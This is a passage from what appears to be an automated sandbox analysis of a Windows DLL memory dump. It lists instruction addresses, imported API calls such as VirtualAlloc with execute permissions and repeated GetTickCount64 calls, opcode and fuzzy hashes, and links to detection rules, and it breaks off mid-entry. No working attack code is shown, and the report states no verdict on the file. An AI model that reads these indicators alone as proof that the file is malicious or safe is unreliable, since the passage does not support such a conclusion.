0x6e7d76b4
0x6e7d76b7
0x6e7d76bc
0x6e7d76c0
0x6e7d76c7
0x6e7d76cb
0x6e7d76ce
0x6e7d76d2
0x6e7d76d6
0x6e7d76d8
0x6e7d76db
0x6e7d76de
0x6e7d76de
0x00000000
0x6e7d7690
0x6e7d781c
0x6e7d781f
0x6e7d7822
0x6e7d783a
0x6e7d7842
0x6e7d77d4
0x6e7d77d4
0x6e7d77da
0x6e7d77dc
0x6e7d77df
0x6e7d77e2
0x6e7d77e5
0x6e7d77e8
0x6e7d77ea
0x6e7d77ed
0x6e7d77f0
0x6e7d77f0
0x00000000
0x6e7d7644
0x6e7d763e
0x6e7d79c4
0x6e7d79cc
0x6e7d79d1
0x6e7d79d7
0x6e7d79df
0x6e7d79e7
0x6e7d79f0
0x6e7d7a02
0x6e7d7a07
0x6e7d7a0f
0x6e7d7a0f
0x6e7d7a10
0x6e7d7a18
0x6e7d7a1d
0x6e7d7a21
0x6e7d7a29
0x6e7d7a31
0x6e7d7a36
0x6e7d7a3b
0x6e7d7a3f
0x6e7d7a43
0x6e7d7a47
0x6e7d7a47
0x6e7d7a51
0x6e7d7a54
0x6e7d7a57
0x6e7d7a5a
0x6e7d7a5c
0x6e7d7a62
0x6e7d7a65
0x6e7d7a6b
0x6e7d7a6e
0x6e7d7a72
0x6e7d7b9e
0x6e7d7b9e
0x6e7d7ba3
0x6e7d7ba3
0x6e7d7bb9
0x6e7d7bbe
0x6e7d7bc6
0x6e7d7bc6
0x6e7d7bc7
0x6e7d7bcf
0x6e7d7bd4
0x6e7d7bd8
0x6e7d7be0
0x6e7d7be8
0x6e7d7bed
0x6e7d7bf2
0x6e7d7bf6
0x6e7d7bfa
0x6e7d7bfe
0x6e7d7bfe
0x6e7d7c0e
0x6e7d7c11
0x6e7d7cdd
0x6e7d7ce0
0x6e7d7ce9
0x6e7d7ceb
0x6e7d7cf2
0x6e7d7d72
0x6e7d7d74
0x6e7d7d74
0x6e7d7d79
0x6e7d7d4a
0x6e7d7d4d
0x6e7d7d5b
0x6e7d7d65
0x6e7d7d65
0x6e7d7cfc
0x6e7d7d01
0x6e7d7d04
0x6e7d7d06
0x00000000
0x00000000
0x6e7d7d08
0x6e7d7d0f
0x6e7d7d22
0x6e7d7d11
0x6e7d7d13
0x6e7d7d1b
0x6e7d7d1b
0x6e7d7d2d
0x6e7d7d47
0x00000000
0x6e7d7d47
0x6e7d7c17
0x6e7d7c1a
0x6e7d7c20
0x6e7d7c20
0x6e7d7c20
0x6e7d7c28
0x6e7d7c2a
0x6e7d7c2f
0x6e7d7c31
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d7c33
0x6e7d7c33
0x6e7d7c33
0x6e7d7c36
0x6e7d7c3c
0x6e7d7c44
0x6e7d7c4c
0x6e7d7c4f
0x6e7d7c50
0x6e7d7c52
0x6e7d7c56
0x6e7d7c5b
0x6e7d7c63
0x6e7d7c67
0x6e7d7c6b
0x6e7d7c73
0x6e7d7c73
0x6e7d7c20
0x00000000
0x00000000
0x00000000
0x6e7d7c20
0x6e7d7c20
0x6e7d7c28
0x6e7d7c2a
0x6e7d7c2f
0x6e7d7c2f
0x6e7d7c20
0x6e7d7a78
0x6e7d7a7a
0x6e7d7a89
0x6e7d7a8c
0x6e7d7ab9
0x6e7d7a8e
0x6e7d7a8e
0x6e7d7a99
0x6e7d7a9e
0x6e7d7aad
0x6e7d7ab2
0x6e7d7ab2
0x6e7d7abe
0x6e7d7ac9
0x6e7d7acc
0x6e7d7a7c
0x6e7d7a7e
0x6e7d7a81
0x6e7d7a81
0x6e7d7acf
0x6e7d7ad2
0x6e7d7ad4
0x6e7d7ad7
0x6e7d7ad9
0x6e7d7adf
0x6e7d7ae2
0x6e7d7ae5
0x6e7d7ae8
0x6e7d7aeb
0x6e7d7af6
0x6e7d7afa
0x6e7d7afd
0x6e7d7afd
0x6e7d7b00
0x6e7d7b00
0x6e7d7b03
0x6e7d7b05
0x6e7d7b0a
0x6e7d7b0a
0x6e7d7b0c
0x6e7d7b10
0x6e7d7b10
0x6e7d7b11
0x6e7d7b14
0x00000000
0x00000000
0x6e7d7b1d
0x6e7d7b20
0x6e7d7b22
0x6e7d7b26
0x6e7d7b2a
0x6e7d7b37
0x6e7d7b3b
0x6e7d7b48
0x6e7d7b4c
0x6e7d7b5f
0x6e7d7b63
0x6e7d7b65
0x6e7d7b6b
0x6e7d7b6b
0x6e7d7b6b
0x6e7d7b6b
0x6e7d7b4e
0x6e7d7b59
0x6e7d7b59
0x6e7d7b3d
0x6e7d7b43
0x6e7d7b43
0x6e7d7b2c
0x6e7d7b32
0x6e7d7b32
0x6e7d7b6f
0x6e7d7b73
0x6e7d7b76
0x6e7d7b78
0x00000000
0x6e7d7b7a
0x6e7d7b7a
0x00000000
0x6e7d7b7a
0x6e7d7b78
0x6e7d7c79
0x6e7d7c80
0x6e7d7c80
0x6e7d7c80
0x6e7d7c82
0x00000000
0x00000000
0x6e7d7c84
0x6e7d7c84
0x6e7d7c88
0x6e7d7c8a
0x6e7d7c8c
0x6e7d7c97
0x6e7d7ca2
0x6e7d7ca7
0x6e7d7cb2
0x6e7d7cb7
0x6e7d7cbc
0x6e7d7cc1
0x6e7d7cc5
0x6e7d7cc9
0x6e7d7ccd
0x6e7d7cd0
0x6e7d7cd4
0x6e7d7cd4
0x00000000
0x6e7d7c8a
0x6e7d7b7d
0x6e7d7b80
0x6e7d7b81
0x6e7d7b84
0x6e7d7b87
0x6e7d7b89
0x6e7d7b89
0x6e7d7b8b
0x6e7d7b8b
0x6e7d7b8e
0x6e7d7b91
0x6e7d7b93
0x6e7d7b96
0x6e7d7b96
0x6e7d7ae2
0x00000000
0x6e7d7ad9
0x6e7d7a60
0x00000000
0x6e7d7a60
0x6e7d71db
0x6e7d71e4
0x6e7d71e7
0x6e7d71e9
0x6e7d71ec
0x6e7d7202
0x6e7d7207
0x6e7d720f
0x6e7d7211
0x6e7d7212
0x6e7d7217
0x6e7d721a
0x6e7d721c
0x6e7d721d
0x6e7d7225
0x6e7d722c
0x6e7d7230
0x00000000
0x6e7d7230
0x6e7d6e4c
0x6e7d6e4d
0x6e7d6e4d
0x6e7d6e4f
0x6e7d6e51
0x6e7d6e54
0x6e7d6e54
0x6e7d6e57
0x6e7d6e59
0x00000000
0x00000000
0x6e7d6e62
0x6e7d6e64
0x6e7d6e67
0x6e7d706d
0x6e7d706f
0x6e7d7077
0x6e7d7087
0x6e7d7087
0x6e7d6e6d
0x6e7d6e6d
0x6e7d6e6f
0x6e7d6e74
0x6e7d6e77
0x6e7d6e7a
0x6e7d6e7d
0x6e7d6e80
0x6e7d6e80
0x6e7d708a
0x6e7d708c
0x6e7d7091
0x6e7d7094
0x6e7d70ad
0x6e7d70ad
0x6e7d70b0
0x6e7d70b2
0x6e7d70b8
0x6e7d70b8
0x6e7d70ba
0x6e7d70be
0x6e7d70c1
0x6e7d70d1
0x6e7d70d1
0x6e7d70d9
0x6e7d70de
0x6e7d70e8
0x6e7d70ed
0x6e7d70ed
0x6e7d70f5
0x6e7d70f7
0x6e7d70fc
0x6e7d7101
0x6e7d7103
0x6e7d7109
0x6e7d710c
0x6e7d7110
0x6e7d7113
0x6e7d7118
0x6e7d711c
0x6e7d7121
0x6e7d7126
0x6e7d712b
0x6e7d712f
0x6e7d7133
0x6e7d7137
0x6e7d713a
0x6e7d713d
0x6e7d713f
0x00000000
0x00000000
0x6e7d70f2
0x6e7d70f2
0x6e7d7141
0x6e7d7149
0x6e7d714b
0x6e7d7150
0x6e7d7152
0x6e7d71ac
0x6e7d71b2
0x6e7d71b3
0x6e7d71b6
0x6e7d71b9
0x6e7d71bc
0x6e7d71bf
0x00000000
0x00000000
0x6e7d71c5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d7154
0x6e7d7154
0x6e7d7157
0x6e7d715a
0x6e7d715f
0x6e7d7164
0x6e7d7167
0x6e7d7171
0x6e7d7176
0x6e7d7179
0x6e7d717c
0x6e7d717f
0x6e7d7183
0x6e7d7187
0x6e7d718a
0x6e7d718d
0x6e7d7191
0x6e7d7195
0x6e7d7199
0x6e7d719e
0x6e7d71a2
0x6e7d71a5
0x6e7d71a8
0x6e7d71a8
0x00000000
0x6e7d70c3
0x6e7d70c3
0x6e7d70c3
0x6e7d70c8
0x6e7d70ca
0x6e7d70cd
0x6e7d70cd
0x00000000
0x6e7d70c3
0x6e7d7096
0x6e7d7096
0x6e7d7098
0x6e7d709d
0x6e7d70a0
0x6e7d70a3
0x6e7d70a4
0x6e7d70a6
0x6e7d70a8
0x6e7d70a8
0x00000000
0x6e7d7096
0x6e7d7094
0x6e7d7237
0x6e7d723a
0x6e7d723c
0x6e7d723f
0x6e7d7245
0x6e7d7247
0x6e7d724a
0x00000000
0x6e7d724a
0x6e7d8014
0x6e7d8014
0x6e7d801a
0x6e7d801b
0x6e7d801e
0x6e7d801e

APIs

__aulldiv.LIBCMT ref: 6E7D64A2
__aullrem.LIBCMT ref: 6E7D64D4
GetTickCount64.KERNEL32 ref: 6E7D6560
GetTickCount64.KERNEL32 ref: 6E7D6562
GetTickCount64.KERNEL32 ref: 6E7D6573
GetTickCount64.KERNEL32 ref: 6E7D6579
__aulldiv.LIBCMT ref: 6E7D658E
__aulldiv.LIBCMT ref: 6E7D65B4
GetThreadLocale.KERNEL32(?,?,00002710,00000000), ref: 6E7D66D5
GetEnvironmentStringsW.KERNEL32(00000050,00000000,00000050,00000000,?,?,00002710,00000000), ref: 6E7D66F3
GetCommandLineA.KERNEL32(?,?,?,?,00002710,00000000), ref: 6E7D6713
IsWow64Message.USER32 ref: 6E7D6793
GetSystemDefaultLangID.KERNEL32(?,?,?,?,?,?,?,?,00002710,00000000), ref: 6E7D67C3
InSendMessage.USER32 ref: 6E7D67FB
GetShellWindow.USER32 ref: 6E7D688C
GetCapture.USER32 ref: 6E7D69F0
AreFileApisANSI.KERNEL32(?,?,?,?,?,?,?,?,00002710,00000000), ref: 6E7D6AE2
GetCapture.USER32 ref: 6E7D6B86
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D6BBB
GetThreadLocale.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00002710,00000000), ref: 6E7D6BCC
InSendMessage.USER32 ref: 6E7D6BD6
GetCurrentThreadId.KERNEL32 ref: 6E7D6C07
GetDialogBaseUnits.USER32 ref: 6E7D6C7D
GetOEMCP.KERNEL32(?,?,?,?,?,?,00002710,00000000), ref: 6E7D6C90
GetForegroundWindow.USER32(?,?,?,?,?,?,00002710,00000000), ref: 6E7D6CD3
GetACP.KERNEL32(?,?,?,?,?,?,00002710,00000000), ref: 6E7D6D10
GetCurrentThreadId.KERNEL32 ref: 6E7D6D18
UnregisterApplicationRecoveryCallback.KERNEL32 ref: 6E7D6D20
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00002710,00000000), ref: 6E7D6D26
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,00002710,00000000), ref: 6E7D6D90
GetTickCount64.KERNEL32 ref: 6E7D6DC0
__aulldiv.LIBCMT ref: 6E7D6DEE
GetTickCount64.KERNEL32 ref: 6E7D70B2
GetACP.KERNEL32(00000000,?,00002710,00000000), ref: 6E7D70C3

Strings

J, xrefs: 6E7D70BA
6, xrefs: 6E7D6C83
h, xrefs: 6E7D670F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$Thread__aulldiv$Message$CaptureCurrentEnvironmentLocaleSendStringsWindow$AllocApisApplicationBaseCallbackCommandDefaultDialogFileForegroundLangLineRecoveryShellSystemUnitsUnothrow_t@std@@@UnregisterVirtualWow64__aullrem__ehfuncinfo$??2@
String ID: 6$J$h
API String ID: 1854928522-144671368
Opcode ID: 1f322b279c40dcb39832d6a264dafd9b20d1aeef6954e6afdd9ec3e365dfaa45
Instruction ID: b52f0b2f2e017d4820c7cdbf3591d23e6e64cea1f1a3115f829b1271add3d6ae
Opcode Fuzzy Hash: 1f322b279c40dcb39832d6a264dafd9b20d1aeef6954e6afdd9ec3e365dfaa45
Instruction Fuzzy Hash: 34F2C171D10A19CFCB11CFF8C9417DEB7BAAF4A354F14866AE409BB251EB305986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5580, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa7c46dd9d372f731f74ae34b1b40cf624e30ffaa012535ad02571c612861178
Instruction ID: bf9f6d43bdbe6b6393979cda5c4a86ac7e0a4d58589e1d772dadd14b084658f8
Opcode Fuzzy Hash: aa7c46dd9d372f731f74ae34b1b40cf624e30ffaa012535ad02571c612861178
Instruction Fuzzy Hash: 0E515921D046A44BCB068FBCD9527FDBBB1FF4A208F0E829CD8989F117E7259649C740

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E36B0, Relevance: 12.2, APIs: 8, Instructions: 159COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6E7E3767
GetTickCount64.KERNEL32 ref: 6E7E3769
GetTickCount64.KERNEL32 ref: 6E7E3770
GetTickCount64.KERNEL32 ref: 6E7E3790
GetTickCount64.KERNEL32 ref: 6E7E37A9
GetTickCount64.KERNEL32 ref: 6E7E37AB
GetTickCount64.KERNEL32 ref: 6E7E37B2
GetTickCount64.KERNEL32 ref: 6E7E37D0

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: e9301473c7491539bb5fe356feb2a2068f76eb795ca6d95d207010cd434122b0
Instruction ID: f92ec31554fee9e5d3aacc7821a3047a3dbf46c2af8d5878807f65e47a1507c6
Opcode Fuzzy Hash: e9301473c7491539bb5fe356feb2a2068f76eb795ca6d95d207010cd434122b0
Instruction Fuzzy Hash: EE511431D10A11DFEB11DFB8C645799B3B4BF5A354F00872AD85AB7A61EB70A881CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D42B0, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E7D42F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E7D431B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D433B
__Getctype.LIBCPMT ref: 6E7D43D7
std::_Facet_Register.LIBCPMT ref: 6E7D43F6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D4416

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 4a9233228909278be1cb7265bdc0e4ced71677937ed03fdabaf75a37c7bfd59e
Instruction ID: 5b3f4eb9de7d6e00bc5192a1a25594c306ccc80602836b73d9869bb40c12f583
Opcode Fuzzy Hash: 4a9233228909278be1cb7265bdc0e4ced71677937ed03fdabaf75a37c7bfd59e
Instruction Fuzzy Hash: 6851F371D046098FDB11CFD8D640ADEB7F8EF05714F248569D809AB761EB30A94ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1600, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E7D162D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E7D167C

Part of subcall function 6E7E579A: _Yarn.LIBCPMT ref: 6E7E57B9
Part of subcall function 6E7E579A: _Yarn.LIBCPMT ref: 6E7E57DD

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D16AE

Strings

bad locale name, xrefs: 6E7D1698
$J}n, xrefs: 6E7D166F, 6E7D167A

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: $J}n$bad locale name
API String ID: 3628047217-616600959
Opcode ID: f84fd8fd7557b714f8a0782cb53bf610308146d9b8e56e0649cf7ce73d167410
Instruction ID: 3ce9e711ab215b6664ed244d153c5cc304ebf147ab037c5b721ada84f5988d3e
Opcode Fuzzy Hash: f84fd8fd7557b714f8a0782cb53bf610308146d9b8e56e0649cf7ce73d167410
Instruction Fuzzy Hash: 54118E719047489FD720CFA8C904B9BBBF8EB19314F008A5EE45AD7B81E775A608CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FB083, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F92A2: HeapAlloc.KERNEL32(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

_free.LIBCMT ref: 6E7FB18E
_free.LIBCMT ref: 6E7FB1A5
_free.LIBCMT ref: 6E7FB1C4
_free.LIBCMT ref: 6E7FB1DF
_free.LIBCMT ref: 6E7FB1F6

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: 5e67f4644fb0542b2e79a58bd0667a05019a6ad4ce87c3dea10e26c39cdf06fb
Instruction ID: ade9eec2a3f1a5934ef1650d8e5cb4e34bbca9e023bc62c1343f56cbfed187a0
Opcode Fuzzy Hash: 5e67f4644fb0542b2e79a58bd0667a05019a6ad4ce87c3dea10e26c39cdf06fb
Instruction Fuzzy Hash: B351C271A04605EFDB15CFA9CE40AAA77F8EF59724B104A6DE809DB764E731E902CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D4930, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E7D4966
std::_Lockit::_Lockit.LIBCPMT ref: 6E7D4986
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D49A6
std::_Facet_Register.LIBCPMT ref: 6E7D4A43
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D4A63

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: c40ea4ef4d362f4f77ba3f4b93a40f55750ab982dbec4dba6738877d37f86b0b
Instruction ID: 52715ba024c20260bbe270a0b77c6e67810d7864282736db3cd42a9e996f7716
Opcode Fuzzy Hash: c40ea4ef4d362f4f77ba3f4b93a40f55750ab982dbec4dba6738877d37f86b0b
Instruction Fuzzy Hash: 8A41C171A046198FCB10CFD5C680BDEB7B4EB45714F14446DD80AAB661EB30AA0ACFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F6DDF, Relevance: 4.6, APIs: 3, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

_free.LIBCMT ref: 6E7F6E85

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_abort_free
String ID:
API String ID: 2251421968-0
Opcode ID: 3dc0b9848d862fde8c3a658161dbd565ec845c9dffebbde580295b976a85c8db
Instruction ID: d0fe7850dee1d15497a11a1c5d24952d2c3919cd55a399afeeae95b206ca6657
Opcode Fuzzy Hash: 3dc0b9848d862fde8c3a658161dbd565ec845c9dffebbde580295b976a85c8db
Instruction Fuzzy Hash: 0B417C32624106DFD754CFECCA94AA9B3F8FF49324B640969E415C73A1D731E912DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F6F49, Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6E7F6F75
__cftoe.LIBCMT ref: 6E7F6FA7

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: e72b7d91c0521d5b10d024a296fa4d42a27479be4a443927c1b7f79a9218c0e5
Instruction ID: c7a669f8a23c095f68de2d0228d41cb289e22a8f279c2ae81ab8a7a11f421088
Opcode Fuzzy Hash: e72b7d91c0521d5b10d024a296fa4d42a27479be4a443927c1b7f79a9218c0e5
Instruction Fuzzy Hash: C021D472418109FADB244ED5DE09EDE3BEDCB82634F604626FD28963A0EF31D74286D1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FB983, Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6E7FB9CF
GetFileType.KERNELBASE(00000000), ref: 6E7FB9E1

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: c823e1dabb31477f36ce21d0d0e1506e778e324c13eb5778b4b3de174f144917
Instruction ID: d369e8b30e60e6dbb739b3dfe0eb19d6659aaf39cf1ebd9cd2788bdec5ef3d17
Opcode Fuzzy Hash: c823e1dabb31477f36ce21d0d0e1506e778e324c13eb5778b4b3de174f144917
Instruction Fuzzy Hash: 7E11BB71114B42CAD760C9FFCA98621BA956F47230B24072DD0B6D67F9C330E887CA55

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D16C0, Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E7D16E6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D177A

Part of subcall function 6E7EE3B8: _free.LIBCMT ref: 6E7EE3CB

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~__free
String ID:
API String ID: 2189227594-0
Opcode ID: 718366b3465b96a7d6df54513956feb4951505cbe5c1495a9598030175f13ca8
Instruction ID: 0aef014f2011500c871e7629f8c9ae48aa85b15ad568156f5bd6c82155406cb1
Opcode Fuzzy Hash: 718366b3465b96a7d6df54513956feb4951505cbe5c1495a9598030175f13ca8
Instruction Fuzzy Hash: 38111DF1A007059BFB20CFA5DA59B57B3ECEB04624F004D39D85AC7A90EB75F5088B91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F64B0, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 6E7FD3D6: GetEnvironmentStringsW.KERNEL32 ref: 6E7FD3DF
Part of subcall function 6E7FD3D6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E7FD402
Part of subcall function 6E7FD3D6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E7FD428
Part of subcall function 6E7FD3D6: _free.LIBCMT ref: 6E7FD43B
Part of subcall function 6E7FD3D6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E7FD44A

_free.LIBCMT ref: 6E7F64F6
_free.LIBCMT ref: 6E7F64FD

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: d1907afabd0ca1fd4bea19a8282fcbae0cee0c286e084a07287bf159315043ce
Instruction ID: 67e3155056b74e00be4b0c872075262a369d26557ae182350e6b6598525f374b
Opcode Fuzzy Hash: d1907afabd0ca1fd4bea19a8282fcbae0cee0c286e084a07287bf159315043ce
Instruction Fuzzy Hash: 12E0A713A5D912C595657AE96B14ADF160C0F92338B600B25D5309B3E2DF6086074595

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E658B, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

std::ios_base::_Init.LIBCPMT ref: 6E7E6591

Part of subcall function 6E7E6360: __EH_prolog3.LIBCMT ref: 6E7E6367
Part of subcall function 6E7E6360: std::locale::_Init.LIBCPMT ref: 6E7E63B0

std::ios_base::_Addstd.LIBCPMT ref: 6E7E65C9

Part of subcall function 6E7D2040: __CxxThrowException@8.LIBVCRUNTIME ref: 6E7D206D
Part of subcall function 6E7D2040: __CxxThrowException@8.LIBVCRUNTIME ref: 6E7D20B2
Part of subcall function 6E7D2040: ___std_exception_copy.LIBVCRUNTIME ref: 6E7D20DF

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

